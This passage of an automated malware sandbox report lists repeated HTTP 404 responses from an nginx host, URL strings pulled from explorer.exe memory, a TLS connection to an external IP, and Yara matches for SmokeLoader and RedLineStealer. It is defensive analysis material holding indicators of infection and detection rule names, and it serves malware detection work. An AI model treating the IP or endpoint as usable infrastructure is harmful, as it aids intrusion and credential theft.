request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:32:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1809694826.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808417932.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1807989575.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1811007850.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1811007850.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1805481373.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1811007850.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49779 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
